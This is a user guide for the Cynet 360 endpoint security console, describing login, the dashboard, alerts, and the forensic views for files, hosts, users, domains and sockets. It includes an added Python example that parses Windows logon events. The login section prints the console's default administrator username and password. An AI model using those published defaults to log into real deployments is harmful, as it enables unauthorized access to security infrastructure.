Cynet 360 – User Guide

v3.7 | May 2020

Contents

1 Cynet 360 – User Guide

2 Cynet 360 Basics

2.1 Logging into Cynet 360

2.2 Interface Layout

2.3 Dashboard

2.3.1 A: Open Alerts

2.3.2 B: Threat Radar

2.3.3 C: Files

2.3.4 D: Alerts by Date

2.3.5 E: Hosts Scanned

3 Working with Alerts—Basic

3.1 Finding Alerts

3.2 Understanding Alerts

4 Investigating Alerts

4.1 Searching for Alerts

4.1.1 Display Fields

4.1.2 Search Fields

4.1.3 Saved Searches

4.1.4 Saved Policies

4.2 Investigating File Alerts

4.2.1 File Details Page

4.2.2 Occurrences

4.2.3 Static Analysis Results

4.3 Investigating Host Alerts

4.3.1 Host Details Page

4.3.2 Hosts Details

4.3.3 Hosts Map View

4.3.4 Host Windows Events

4.3.5 Host System Overview View (IoT Discovery)

4.4 Investigating User Alerts

4.4.1 User Details Page

4.5 Investigating Domains

4.5.1 Investigating Domains and IP Addresses

4.6 Investigating Sockets

4.6.1 Socket Details View

5 Finding and Managing Alerts

5.1 Creating Alert Whitelist Profiles

5.1.1 Creating a Whitelist Profile from an Alert

5.1.2 Creating an Alert Whitelist Profile from the Whitelist Tab

5.2 Automatically Remediate Alerts

5.2.1 Creating Auto Remediation Rules

5.2.2 Editing Auto Remediation Rules

5.2.3 Deleting Auto Remediation Rules

6 NextGen AV

6.1 Activating NextGen AV

6.2 Installing the CynetEPS Detection Engine

6.3 Enabling Cynet 360 NGAV

7 Understanding Forensics

7.1 Performing Favorite Searches

7.2 File Favorite Searches

7.3 Host Favorite Searches

7.4 User Favorite Searches

7.5 Domain Favorite Searches

7.6 Socket Favorite Searches

7.7 Taking Actions

7.7.1 Taking Actions on an Alert

7.7.2 Domain Actions

7.7.3 Hosts Actions

7.7.4 Analysis Action

7.7.5 Whitelisting Actions

7.7.6 Taking Remediation Actions

7.7.7 Auto-Remediation Actions

7.7.8 Actions Page

7.8 Deception Users

7.8.1 Activating Deception Users

7.8.2 Configuring Deception Users

7.9 Deception Files

7.9.1 Deception Office Documents

7.9.2 Deception RDP Files

7.9.3 Deception ODBC Connection

7.9.4 Deception Text Files

7.9.5 Deception Stored Credentials

7.9.6 Activating Deception Files

7.9.7 Configuring Deception Files

7.9.8 Enabling Decoy Files in a Group

7.9.9 Adding a New Deception File

7.10 Deception Network

7.10.1 Activating the Deception Network

7.10.2 Configuring the Deception Network

7.10.3 Send to SOC Tab

7.10.4 Host Actions

7.10.5 Users Actions

7.10.6 Network Actions

7.11 Running Manual Scans

8 Managerial Tasks

8.1 Generating Reports

8.1.1 Generating Alerts Reports

8.1.2 Generating Top Risks Report

8.1.3 Generating Vulnerabilities Assessment (VA) Reports

8.1.4 Generating Inventory Reports

9 Auditing Actions

9.1 Auditing Using the Cynet UI

9.2 Auditing using External Log Files

10 Managing Users

10.1 Integrating with Active Directory

10.1.1 Importing User Settings Data from Active Directory (AD)

10.1.2 Importing User Settings from a CSV File

10.1.3 Creating New Users

10.1.4 Activate Chief Information Security Officer (CISO) Kit

10.1.5 Adding Users to Groups

10.2 Enabled Identities

10.3 Active Directory Authentication Settings

10.3.2 Setting the User Authentication Method

10.3.3 Managing Cynet Users

10.3.4 Configuring User SMS Confirmation Settings

10.4 Authenticating an Active Directory Group

10.5 Managing Multi-Factor Authentication (MFA)

10.5.1 Activating MFA for a User

10.5.2 Removing MFA for a User

10.6 Password Complexity

10.6.1 Changing a User’s Password

10.7 Deleting a User

11 Deception

11.1 Deception Users

11.1.1 Activating Deception Users

11.1.2 Configuring Deception Users

11.2 Deception Files

11.2.1 Deception Office Documents

11.2.2 Deception RDP Files

11.2.3 Deception ODBC Connection

11.2.4 Deception Text Files

11.2.5 Deception Stored Credentials

11.2.6 Activating Deception Files

11.2.7 Configuring Deception Files

11.2.8 Enabling Decoy Files in a Group

11.2.9 Adding a New Decoy File

11.3 Deception Network

11.3.1 Activating the Deception Network

11.3.2 Configuring the Deception Network

12 Scanning On-Demand (Threat Hunting)

12.1.1 Enabling Threat Hunting

12.1.2 Configuring Threat Hunting Settings

12.1.3 Threat Hunting Results

13 Using the Cynet SIEM API

14 Setting Up Cynet

14.1 Settings

14.2 Setting Up Cynet to Detect Threats

14.2.1 Setting Up Scan Groups

14.2.2 Additional Settings

14.2.3 Configuring Scan Population Settings

14.2.4 Configuring Scan Schedule Settings

14.2.5 Setting Scan Frequency (Throttle Settings)

14.2.6 Excluding IP Addresses and Hosts from Scans

14.2.7 Excluding Analysis Policies from Scans

14.2.8 Excluding Domains from Scans

14.2.9 Configuring Network Traffic Analysis Settings

14.2.10 Configuring Log Parser Settings

14.2.11 Analytics Server Configurations

14.2.12 Monitoring Malicious Logins

14.3 Configuring Advanced Settings

14.3.1 Configuring Connection Settings

14.3.2 Configuring Privacy & Compliance Settings

14.3.3 Disabling Collection of Data

14.3.4 Configuring Cynet SOC Settings

14.3.5 Configuring Slave Server Settings

14.3.6 Configuring Console Settings

14.3.7 Windows Events

14.3.8 File Monitoring Settings

14.4 Analysis

14.4.1 Dynamic Analysis Settings

14.4.2 Deep Scan Settings

14.4.3 Alert Process Tree

14.5 Configuring Vulnerability Management Settings

14.5.1 Configuring Windows Patch Validation

14.5.2 Unauthorized Applications

14.5.3 Application Patch Validation

14.5.4 Agents Validation

14.5.5 Configuring UBA Management

14.6 Customizing Auto-Remediation Actions

14.6.1 Configuring Remediation Settings

14.7 Custom Remediation Playbooks

14.7.1 Configuring the Custom Remediation Playbook

14.7.2 Applying the Custom Remediation Playbook

14.8 Viewing System Information

14.8.1 Main Info

14.8.2 System Health

14.9 Configuring Alerts

14.9.1 Email Settings

14.9.2 General Settings

14.9.3 Configuring Alert Settings

14.9.4 Unscanned Host Alert Settings

14.9.5 Email Alert Filter Settings

Appendix A File Monitoring

Appendix B Windows Events

Appendix C Multi-Tenant Architecture

C.1 General Overview

C.2 Global Manager

C.3 Distributed Architecture

C.4 Traffic Router

C.5 Master/Slave Architecture

Appendix D System Components

D.1 Understanding Cynet Binaries

D.1.1 Executables (Windows)

D.1.2 Daemons (Linux & Mac)

D.2 Cynet Services

D.2.1 Cynet Server Services

D.2.2 Endpoint Services (Windows)

D.2.3 Endpoint Services (Linux)

D.2.4 Endpoint Services (Mac)

D.3 CynetEPS Command-Line Flags

D.4 Terms and Abbreviations

The Cynet SOC and Support are available to customers for any issues, questions, or comments:

Phone (IL): +972-72-336-9736

Phone (US): +1-347-474-0048

Phone (EU): +44-203-290-9051

Support Email: [email protected]

CyOps Email: [email protected]

Total Environment Visibility

An organization’s attack surface is much wider than its endpoints. Cynet continuously monitors all User logins and logouts, internal and external traffic, and process execution on hosts. This provides real-time contextual visibility into the entire environment’s activities.

360° Prevention and Detection

Cynet continuously builds and integrates technologies to prevent and detect attack vectors that target Users, files, the network, and hosts: AV, NGAV, EDR, network analytics, UEBA, and deception. This builds a robust security protection stack across all attack stages.

Automated Remediation

Cynet provides the widest set available of remediation actions for compromised hosts and Users, malicious files, and network communication. Cynet is shipped with pre-built remediation tools, making it the only solution with the ability to automatically block attacks at multiple post-compromise stages, such as privilege escalation, credential theft, and lateral movement.

Context-Based Alert Operation

In the case of malicious activity without a matching pre-built remediation, Cynet provides the full User, file, network, and host context for rapid insight into an attack’s impact and scope. The resolving process concludes with manually applying a remediation action on the compromised entity, which can be saved as a policy to automate the response to future occurrences.

Easy Deployment and Maintenance

Cynet is based on a server-agent architecture. The server can be on-site, IaaS, or hybrid, according to customer preference. The endpoint component can be either a dissolvable executable or a lightweight agent that deploys rapidly, to up to 50,000 hosts in a single day.

CyOps 24×7 Security Expertise

Cynet complements its automated threat protection technology with integrated security services at no additional cost. CyOps is a 24/7 team of threat analysts and security researchers that proactively hunts for threats among Cynet’s customers, as well as responding to customer escalations, assisting with file analysis, incident response, and deep investigation.

Cynet 360 Basics

This section provides instructions on logging into the system and a description of the Cynet 360 User Interface (UI).

Logging into Cynet 360

To log into the Cynet 360 console, navigate to: https://*CYNET_SERVER*:8443.

*CYNET_SERVER* is the IP address or hostname of your Cynet 360 server. Navigating to this URL opens the Cynet 360 login page.

To log in for the first time, use the following default credentials:

Username: Operator

Password: qwdftyjkop

Note

We recommend that you change the default Operator credentials after initial login and after creating additional User accounts.

You may receive the message “Your connection is not private”. The reason for this is that Cynet uses a self-signed certificate. To remove this message, install a CA-issued certificate on the Cynet IIS site. To ignore this message and proceed, click Advanced followed by Proceed to localhost.

Interface Layout

The Cynet 360 UI provides a simple layout for navigating the system. There are nine main sections. You can easily navigate the UI using the main navigation menu on the left side of the screen. The main sections of the UI are as shown in the following screenshot.

Dashboard: Provides an overview of Alerts, Scans, and Analysis. See “Dashboard”.
Alerts: Shows all alerts generated by the system. See “Finding Alerts”.
Forensic: Shows all data from files, Users, hosts, and the network. See “Understanding Forensics”.
Actions: Shows all remediation actions taken and the results of these actions. See “Actions”.
Scanner: Shows all scan results of hosts in the environment. See “Running Host Scans”.
Reports: Shows all reports generated by the system. See “Generating Reports”.
Map: Shows a map of all configured locations. See “Maps”.
Audit: Shows all User actions performed with the system. See “Auditing Actions”.
Settings: Enables Users to modify all system configuration settings. See “Settings”.

In addition to the main navigation menu, some pages contain sub-menus which you can use to navigate to other pages within the section, as shown in the following screenshot.

At the top of each page of the UI, the following displays:

Current date and time

Current logged-in User

A link to log out of the system

If the Cynet server is configured for multi-tenancy (as in the Master-Slave architecture), a drop-down menu appears next to the current logged-in User. This menu provides access to the other Cynet servers currently configured to point to this Master server. See D.2.1 “Cynet Server Services”.

Dashboard

The Dashboard provides a high-level overview of the current security status of the environment. It displays the current number of open alerts, files that have been analyzed, and hosts that have been scanned. The Dashboard enables navigation to other areas of the UI based on this information. There are five main parts to the dashboard, as shown in the following screenshot.

A: Open Alerts
B: Threat Radar
C: Files
D: Alerts by Date
E: Hosts Scanned

A: Open Alerts

Open Alerts displays metrics for current open alerts of all severity levels and the numbers of Files, Users, Hosts, and amount of Network traffic associated with these open alerts. The colored ring around Total Alerts indicates the severity of the alerts.

To display the number of open alerts of a certain severity, place the cursor on a colored portion of the Total Alerts ring.

To navigate to the Files, Users, Hosts, or Network alerts pages, click the associated icon.

IMPORTANT!

Currently, system alerts do not display (for example, deception files).

B: Threat Radar

The central circular area displays the overall risk level (the Total Security Score); the surrounding “radar” area indicates high-risk Files, Users, Hosts, and Network traffic.

The Total Security Score is calculated from the current risk levels of every File, User, Host, and Network object, as well as from any Open Alert.

Individual risk scores for objects are shown as circles in the radar area. Objects with open alerts display as solid red circles. To view more details about these alerts, click on these circles.

If the alert has a severity score of over 1000, a notification appears under the Cynet Radar.

To display the object name and the associated Alert, click an item in the radar area. To view the details of this object, click .

C: Files

The Files area displays metrics about files that have been scanned and analyzed by the system. The percentage of “whitelisted” files indicates the number of files that have been analyzed and deemed safe by security intelligence. The Cynet CyOps SOC determines if files are safe, based on metadata collected and behavioral analysis. The SOC reviews the remaining files.

D: Alerts by Date

Alerts by Date displays a graph of alerts generated over the past ten days. The graph is a timeline of alerts generated per day.

To see the number of alerts generated on a particular day, position the cursor over that day.

E: Hosts Scanned

Hosts Scanned displays metrics of recently-scanned Hosts. It shows statistics for the number of Hosts scanned in the past day, week, and month.

Working with Alerts—Basic

When Cynet 360 identifies a suspicious or dangerous activity, it generates an alert. Alerts are divided into the following categories:

All alerts

File alerts

User alerts

Network alerts

Host alerts

Analysts might want to investigate specific alerts recorded by the system to find out more information about them.

Finding Alerts

The Alerts page provides a customizable view of the alerts generated by the system. You can use individual filters to display specific alerts, and you can take actions on displayed alerts. This page contains the following information:

A (Alert Types Menu): Enables the filtering of alerts generated for Files, Users, Hosts, Network, or All Alerts. All Alerts is the default and includes system alerts.
B (Quick Search): Enables the quick filtering of displayed alerts using a keyword search.
C (Alert Actions): Enables the export of displayed alerts to an Excel file and/or taking a Remediation Action. See “Taking Remediation Actions”.
D (Alerts Quick Filter Bar): Enables the quick filtering of alerts by Alert Name, Severity, Status, Host name, File name, User name, Network, or Alert Date. You can select all currently visible alerts and perform actions on multiple alerts.
E (Load Entries): Use the drop-down menu to display more or fewer alerts. The default is 25 alerts.
F (Displayed Alerts): Displays all alerts and relevant information about them according to the filter criteria set in the Alerts Filter Bar. To view details about an alert, click . See “Understanding Alerts”.
G (Alert Status): The Alert status is displayed below the Alert name. You can change the status individually or in a group.
H (Total Open Alerts): Displays the current number of open alerts and the distribution of File, User, Network, and Host alerts.

Understanding Alerts

To view more details on displayed alerts, click .

Additional information displays as shown below.

Description: Displays details of the endpoint that triggered the alert: hostname, IP address, OS version, CynetEPS version, and Configuration version.
Recommendation: Displays Cynet SOC recommendations for remediation actions you can take, based on the type and severity of the alert.
Process Tree: Displays all processes that were run and triggered the alert. The tree displays the parent process (topmost) and its children, based on the process calling order (the parent leaf triggered the child leaf). The bottommost process is the last process in the calling chain; this is the process that the Alert in focus detected as malicious.
Comments: For tracking and analysis purposes, Analysts or the CISO can add comments based on the investigation and resolution of the alert.
Path and Hash: Some alerts also indicate the file Path and Hash, to enrich the analysis and Incident Response with more metadata.

Investigating Alerts

The Forensic page enables you to perform an in-depth investigation into an Alert. For more details on using Forensic features, see “Understanding Forensics”.

Searching for Alerts

Advanced Search enables you to customize a search for Files, Hosts, Users, and Network traffic based on any of the available metadata fields, or to change the displayed fields in the Inventory List on any Forensic page.

To begin an advanced search, or to edit the displayed file fields, click Advanced Search.

The following window displays:

A (Display Fields): Select or clear Display Fields to modify the Inventory.
B (Search Fields): To specify search criteria, use Search Fields.
C (Saved Searches): To save searches for future use, use Saved Searches.
D (Saved Policies): To apply selected search criteria as an indicator that contributes to an object’s risk level in the future, save the search criteria to Saved Policies. Saved Policies can be configured to open an alert when the policy’s search criteria are matched.

Display Fields

You can modify the Inventory List on the Forensic pages to display additional columns. To add or remove columns from the Inventory List, select or clear fields from the Display Fields menu.

After selecting the fields you want to view, the columns in the Inventory List automatically update.

Search Fields

Adding Search Field Parameters

To add a field to the Search Fields window:

In the Display Fields menu, click .

From the drop-down menu, select the appropriate logical Operator for each field added.

Enter search filters for each field.

To apply the search filters to the Inventory list, click Search.

To remove a field from the Search Fields window, click

Note

Fields not selected in the Display Fields menu can still be used in the Search Fields as search filters. Although these columns do not appear in the Inventory List, they are still applied to the search results.

Saved Searches

Search filters can be saved for future use in Saved Searches.

To save search filters:

Click Save Search.

Enter a name for the saved search.

Click OK.

The saved search appears in the Saved Searches menu.

To use the saved search, click the search name in Saved Searches. The Search Fields window populates with the search filters you saved.

To add your Saved Search to Favorite Searches, click the ☆.

To delete a Saved Search:

In Saved Searches, click X next to the Saved Search name.

Click OK.

The Saved Search is deleted.

Saved Policies

You can create Saved Policies to apply a custom risk level to objects based on collected indicators. You can also create Saved Policies to open an alert on objects relevant to the policy.

To create a Saved Policy:

Enter search filter criteria in Search Fields.

To save these filters as a policy click Save Policy.

Enter a policy name.

Enter a policy risk number between one and a thousand.

Select Open alert on policy match.

To reopen an alert for a new occurrence of an event based on your Saved Policy, select Reopen alert on new occurrence.

From the drop-down menu, select the alert severity.

Click OK.

The saved policy appears under Saved Policies. To apply the saved policy to a new search, click the policy name in Saved Policies. The Search Fields window populates with the filters in that saved policy.

To delete a Saved Policy, click X next to the Saved Policy name.

Objects that match the Saved Policy criteria appear in the object’s Details Page as a triggered indicator. The risk value you entered in Saved Policy is factored into the new risk level for the object.

If the saved policy was configured to open an alert on policy match, you receive the alert in the main alerts page.

The alert name is the policy name you selected.

Investigating File Alerts

The Forensic page Files tab provides visibility into all scanned files in the organization and enables you to obtain file-specific information. The default Files Inventory list contains the following parameters:

File Name: To access the File Details page, click the File Name.
Risk Level: The current risk level of the file.
Company Name: The file publisher information.
Endpoints: The number of endpoints where the file that triggered the alert resides.
Antiviruses: The number of antivirus vendors that have signatures for this file.
First Seen: The date and time when this file was first seen in the environment.
Last Seen: The date and time when this file was last seen in the environment.

You can select the columns to display in the Inventory List, as described in “Display Fields”.

File Details Page

The File Details page provides information collected by the system about the selected file. At the top of the File Details page, a timeline describes the lifecycle of the file, as shown in the following screenshot.

The file relationship screenshot displays how the file is related to other entities in the organization.

A: This section displays associated Hosts, Processes (parent or child), Users, or Network entities. To access the details page of an entity, click it.
B: This section displays the File Name and the Risk Level.
C: This section displays all detected Indicators for this file:

High severity indicators display in Red.

Medium severity indicators display in Gold.

Low severity indicators display in Blue.

Positive indicators display in Green.

The lower section of the File Details page displays multiple tabs providing detailed information about this file, as shown in the following screenshot.

Note

Some tabs may not appear in the File Details page if there is no relevant data to be displayed for that category.

Details: Displays metadata about the file, such as file size, path, publisher, and hashes.
Alerts: Displays all alerts associated with this file. The relevant remediation action tools are associated with each alert.
Occurrences: Displays all instances of the process on all hosts. Each row shows which host or hosts it ran on, and which User or Users ran the process. See “Occurrences”.
Hosts: Displays the hosts which contain this file.
Users: Displays all Users running this file.
Static Analysis: Displays information collected during the static analysis of the file.
Sockets: Displays the network traffic generated to and from this file.
Domains: Displays the domains queried by this process to initiate network traffic.
Process DLLs: Displays the DLL files loaded by this process.
Dynamic Analysis: Displays the information collected and generated from a sandbox execution of the file in the Cynet SSE.

Occurrences

The Occurrences tab displays each instance of a file throughout the environment. If a specific file was executed on two hosts, there would be two entries in the Occurrences tab.

To view additional information on each process occurrence, click +.

Each occurrence includes details about how the file ran during that instance, including the running User, command-line, and the path from which the file was run.

Static Analysis Results

To display Static Analysis results click the Static Analysis tab on the File Details Page.

The information in this section includes:

A (Meta area): Displays metadata such as hashes, product name (for example, “Microsoft Windows Operating System”), version information, build information, product description, digital signature, timestamp, scattering, and fingerprinting (for example, “MS Visual C++ 8.0 DLL”).
B (Strings in File): Displays all the text strings inside the file.
C (File Analysis area): Displays imported functions, as well as File Header Information.
D (File Headers section): Displays the file headers and the Portable Executable (PE) sections with their respective hashes. PE section names typically include .text, .rdata, .data, .pdata, .rsrc, and .reloc.

Investigating Host Alerts

The Forensic Page Hosts tab displays all scanned hosts in the organization and enables you to obtain host-specific information. The default Hosts Inventory list contains the following columns:

Host Name: The name of the host. To access the Host Details page, click the host name.
Risk Level: The host’s current risk level.
Last Scan: The date and time when this host was last scanned by the system.
Host IP: The IP address of the endpoint.
OS Version: The operating system of the endpoint.
# Process: The number of processes detected running on the endpoint.
# Logged Users: The number of Users logged in to the endpoint.
# Connections: The number of network connections detected at the endpoint.

You can select the columns to display in the Inventory List, as described in “Display Fields”.

Host Details Page

Click a host name to view its details. The Host Details page displays information collected by the system for the selected host. A timeline displays describing the lifecycle of the host.

The following host relationship screenshot displays how the host is related to other entities in the organization.

A: This section displays associated Files, Users, and Network entities. To access the details page of an entity, click it.
B: This section displays the Host Name and Risk Level.
C: This section displays all detected Indicators for this host:

High severity indicators display in Red.

Medium severity indicators display in Gold.

Low severity indicators display in Blue.

Positive indicators display in Green.

The lower section of the Host Details page displays multiple tabs providing detailed information about this host, as shown in the following screenshot.

Hosts Details

The following sections appear in Host Details:

Details: Displays metadata about the host, such as host name, IP address, operating system, and software versions.
Alerts: Displays all alerts associated with this host.
Files: Displays all the files and processes executed on this host.
Users: Displays all the Users configured on the host, with additional information about User logins.
Traffic: Displays the Domains accessed by this host, as well as open network sockets, cached DNS requests, configured IP addresses, ARP table entries, and the NICs on the host. (The screenshot below displays the Host’s accessed Domains.) Socket information presents full details of network activity on the protected asset, by IP and Port.
Vulnerability Assessment: Provides a view of the Host’s vulnerabilities, namely a list of missing Windows patches that need to be installed on the Host (Windows Patches) and a list of the Unauthorized Applications installed on the Host (Unauthorized Applications).
File Monitor: A complete list of the files currently monitored by Cynet on the Cynet-protected Hosts.
System: Contains several lists: security certificates, installed operating system updates, installed software, and network shares on the Host.

Note

Certain tabs might not appear in the Hosts Details page if there is no relevant data to be displayed for that category.

Hosts Map View

The Hosts Map view enables the Operator to view the organization’s network segments and endpoints in an interconnected map display.

To access the Host Map view, select Map from the Hosts drop-down menu in Forensic.

Hosts can appear in three different colors, where different colors represent the risk status of the host:

Red: High Risk

Blue: Low Risk

To collapse or expand an object, click it.

When you click a host, the host’s detailed information appears below the map.

As in the Forensic Hosts view, the tabs under the Hosts Map display the Forensic metadata of the host selected in the map (Details, Alerts, Files, Users, Traffic, System, Vulnerability Assessment, and File Monitor).

Host Windows Events

Collected Windows Events appear under Host Windows Events.

In the general view you can see the Event ID collected by Cynet as well as the Event Type (for example, Security Event 4624 in the screenshot below).

Expanding an event shows the full details of the collected event: the parsed event data divided into metadata fields.

Once the data is parsed by the Cynet server, you can use the free text search to find all events that match specific keys.
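As an added example (not Cynet’s code), the following Python script mimics the parse-then-search flow described above: it flattens constructed Windows Security events (a 4624 logon and a 4625 failed logon, in the XML layout of an Event Viewer export) into metadata fields, labels the event type and logon type, and searches the parsed fields by key or by free text. The hostnames, user names and addresses are constructed sample values.

```python
"""Parse Windows Security events into metadata fields and search them.

Added example, not Cynet code: it mimics the parse-then-search flow the
guide describes for Host Windows Events. All sample events are constructed.
"""
import xml.etree.ElementTree as ET

EVENT_NS = "http://schemas.microsoft.com/win/2004/08/events/event"
NS = {"e": EVENT_NS}

# Labels for a few Security event IDs (documented Windows values).
EVENT_TYPES = {
    "4624": "An account was successfully logged on",
    "4625": "An account failed to log on",
    "4688": "A new process has been created",
}

# Documented Windows logon types carried by 4624/4625 events.
LOGON_TYPES = {
    "2": "Interactive", "3": "Network", "4": "Batch", "5": "Service",
    "7": "Unlock", "8": "NetworkCleartext", "9": "NewCredentials",
    "10": "RemoteInteractive", "11": "CachedInteractive",
}


def make_event_xml(event_id, computer, time_created, data):
    """Build a constructed event in the XML layout of an Event Viewer /
    wevtutil export; used only to produce sample input for this example."""
    data_xml = "".join(
        f'<Data Name="{name}">{value}</Data>' for name, value in data.items()
    )
    return (
        f'<Event xmlns="{EVENT_NS}"><System>'
        '<Provider Name="Microsoft-Windows-Security-Auditing"/>'
        f"<EventID>{event_id}</EventID>"
        f'<TimeCreated SystemTime="{time_created}"/>'
        f"<Channel>Security</Channel><Computer>{computer}</Computer>"
        f"</System><EventData>{data_xml}</EventData></Event>"
    )


# Constructed sample events: one RDP (type 10) logon, one failed network logon.
SAMPLE_EVENTS_XML = [
    make_event_xml("4624", "WS-FIN-07.corp.example", "2020-05-12T08:15:30Z", {
        "TargetUserName": "j.doe", "TargetDomainName": "CORP",
        "LogonType": "10", "IpAddress": "10.20.30.40",
        "WorkstationName": "LAPTOP-22",
    }),
    make_event_xml("4625", "WS-FIN-07.corp.example", "2020-05-12T08:16:02Z", {
        "TargetUserName": "administrator", "TargetDomainName": "CORP",
        "LogonType": "3", "IpAddress": "10.20.30.41", "Status": "0xc000006d",
    }),
]


def parse_event(xml_text):
    """Flatten one event into a dict of metadata fields: the <System>
    header values plus every <Data Name=...> element under <EventData>."""
    root = ET.fromstring(xml_text)
    system = root.find("e:System", NS)
    fields = {
        "EventID": system.findtext("e:EventID", namespaces=NS),
        "Channel": system.findtext("e:Channel", namespaces=NS),
        "Computer": system.findtext("e:Computer", namespaces=NS),
        "TimeCreated": system.find("e:TimeCreated", NS).get("SystemTime"),
    }
    fields["EventType"] = EVENT_TYPES.get(fields["EventID"], "Unknown event")
    for data in root.iterfind("e:EventData/e:Data", NS):
        fields[data.get("Name")] = data.text or ""
    if "LogonType" in fields:
        fields["LogonTypeName"] = LOGON_TYPES.get(fields["LogonType"], "Unknown")
    return fields


def search_events(events, query):
    """Search parsed events. 'Key=value' matches one field exactly
    (case-insensitive); any other text matches if some field contains it."""
    if "=" in query:
        key, _, value = query.partition("=")
        key, value = key.strip(), value.strip().lower()
        return [ev for ev in events if key in ev and str(ev[key]).lower() == value]
    needle = query.lower()
    return [ev for ev in events if any(needle in str(v).lower() for v in ev.values())]


if __name__ == "__main__":
    parsed = [parse_event(x) for x in SAMPLE_EVENTS_XML]
    for ev in parsed:
        print(ev["EventID"], ev["EventType"], ev.get("TargetUserName"))
    print([ev["EventID"] for ev in search_events(parsed, "LogonType=10")])
```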

Host System Overview View (IoT Discovery)

The Hosts System Overview view enables the Operator to view the organization’s hosts that have communicated with IoT devices.

To access the Host System Overview view, in the Forensics Page, click the Hosts tab and select System Overview.

After clicking, the System Overview table appears, with the following columns:

Host: The Cynet-protected endpoint or IoT device (the device on which the Cynet EPS module is installed).
MAC Address: The device’s MAC address, typically associated with a MAC Vendor.
IP: The IP address of the Host.
First Seen: Select the start and end date for the investigated period.
Last Seen: Select the start and end date for the investigated period.
MAC Vendor: The Vendor of the Host (for example, HP or Xerox). This value is updated automatically when it is associated with the MAC Address.
Comments: All comments about the Host entered by Operators.

Note

If a Comment field is not displayed, it indicates that there are no comments associated with this host.

Investigating User Alerts

The Forensic page Users tab provides information on all scanned User accounts in the organization. You can also access User-specific information.

The User Alert tab displays a list of all User accounts that have logged into Cynet-protected hosts, as well as their metadata.

The default Users Inventory list contains the following columns:

Name: The name of a User account that logged into a Cynet-protected asset (a Cynet Host). To access the User Details page, click the User’s name.
Risk: The current risk score, or risk level, of the User account.
Locked: Displays YES if the User account is currently locked out, or NO if it is not. To filter the results by locked-out status, or to see all accounts, select an option from the drop-down menu.
Disabled: Displays YES if the User account is currently disabled, or NO if it is not. To filter the results by disabled status, or to see all accounts, select an option from the drop-down menu.
Running Files: The number of files currently running under the User account.
Password Age: The age of the User account password in days.
Last Login: The date and time of the last login to a Host from the User account.
First Seen: The date and time when the User account was first seen in the environment.

You can select the columns to display in the Inventory List, as described above in “Display Fields”.

User Details Page

The Forensic page User Details tab displays information collected by the system about the selected User. A timeline displays the recorded events of the User.

Click the + to display additional information about the objects.

The User Relationship diagram shows how the User is related to other entities in the organization:

Section: Description
A: Displays associated Files, Hosts, or Network entities. To access the details page of an entity, click it.
B: Displays the User Name and Risk Level.
C: Displays all detected Indicators for this User:

High severity indicators display in Red.

Medium severity indicators display in Gold.

Low severity indicators display in Blue.

Positive indicators display in Green.

The lower section of the page displays multiple tabs providing detailed information about this User:

Tab: Description
Details: Metadata about this User, such as:

User name

Last login date

Number of files running under the User

The number of endpoints the User logged into in the last day, week, and month

Alerts: All alerts associated with this User.

Files: All the files being run by this User.

Hosts: All Hosts this User has logged into.

Domains: A list of domains that the User tried to access.

Sockets: The sockets accessed by this User.

Logins: A list of all logins by this User across all scanned hosts.

File Monitor: File monitoring data. The default view displays all events; it can be filtered by action type (Execute, Created, Deleted, Access, and Rename).

Note

Certain tabs might not appear in the Details page if there is no relevant data to be displayed for that category.

Investigating Domains

The Forensic page Domains tab provides visibility into all Domains resolved on Hosts in the Cynet-protected environment.

The default Domains Inventory list contains the following columns:

Column: Description
Domain: The resolved domain. For additional information, click the domain name (see “Investigating Domains and IP Addresses” below).
Risk Level: The Domain’s current risk level.
Classification: The Domain classification based on security intelligence.
Date In: The date and time when the Domain was first resolved.
Last Seen: The last time the Domain was resolved.
URL Count: The number of URLs visited under this Domain.
Host Count: The number of Hosts that have resolved this Domain.
Remote IP Count: The number of remote IP addresses this Domain has resolved to.
Source IP Count: The number of local IP addresses that have resolved this Domain.
User Count: The number of Users that have resolved this Domain.

You can select the columns to display in the Inventory List, as described in “Display Fields”.

Investigating Domains and IP Addresses

The Domain/IP Address Details page displays the information collected by the system about the selected Domain or IP address. A timeline displays the Domain’s recorded events.

The Domain Relationship diagram shows how the Domain is related to other entities in the organization:

Section: Description
A: Displays associated Files, Hosts, and User entities. To access the details page of an entity, click it.
B: Displays the Domain Name and Risk Level.
C: Displays all detected Indicators for this Domain:

High severity indicators display in Red.

Medium severity indicators display in Gold.

Low severity indicators display in Blue.

Positive indicators display in Green.

The lower section of the page displays multiple tabs providing detailed information about this Domain:

Tab: Description
Details: Details about the domain, including:

The number of endpoints that have accessed this domain

The first/last time the domain was seen

Domain properties

Domain Overview

Security Intelligence

Alerts: All alerts associated with this domain.
Occurrences: Occurrences related to this domain (for example, the IP addresses the domain resolved to).

Hosts: The Hosts that have requested resolution of this domain.

Users: Users related to this domain.

URLs: Each URL observed under this domain, together with the remote IP address it resolved to.

Remote IPs to URLs: The list of remote IPs obtained by resolving the domain’s URLs (equivalently, the remote IPs that Cynet hosts connected to when requesting the specific URL/Domain).

Investigating Sockets

The Forensic page Sockets tab provides visibility into all network Sockets created on Hosts in the environment.

The default Sockets Inventory list contains the following columns:

Column: Description
Host Name: The Host associated with the network traffic. To go to the Host Details page, click the Host Name.
Risk Level: The network Socket’s current risk level.
Local IP: The source IP address of the network traffic. To go to the Domain/IP Address Details page, click the Local IP.
Local Port: The source port of the network traffic.
Remote IP: The destination IP address of the network traffic. To go to the Domain/IP Address Details page, click the Remote IP.
Remote Port: The destination port of the network traffic.
First Seen: The date and time when this network traffic was first seen by CynetEPS.
Last Seen: The date and time when this network traffic was last seen by CynetEPS.

You can select the columns to display in the Inventory List, as described in “Display Fields”.

Clicking the Host Name opens the Host Forensics details page for that Host, which gives a holistic view of the Host’s Users, Alerts, Files, Sockets, Domains, and Vulnerability Assessment.

To drill-down on the specific Host’s socket monitoring, click on the Host’s Local IP.

Socket Details View

Clicking a Host’s Local IP in the Sockets inventory opens the Socket Forensics view, which displays the detailed Socket information collected by the system about the selected Socket (the Local IP of the specific Host).

A timeline displays the Socket’s recorded events.

The Socket Relationship diagram shows how the Socket is related to other entities in the organization (Users, Files, and Hosts). When the collected metadata allows it, Indicators are also shown.

Section: Description
A: Displays associated Files, Hosts, and User entities. To access the details page of an entity, click it.
B: Displays the Socket (here, the Local IP) and its Risk Level.
C: Displays all detected Indicators for this Socket:

High severity indicators display in Red.

Medium severity indicators display in Gold.

Low severity indicators display in Blue.

Positive indicators display in Green.

The lower section of the page displays multiple tabs providing detailed information about this Socket:

Tab: Description
Details: Details about the Socket, including:

The Local IP of the Socket

The Remote IP of the Socket

The Port used by the Socket

The SHA256 of each file exchanged over the Socket

Whether the Remote IP is known or unknown, and whether it is internal or external to the LAN

First and Last Seen

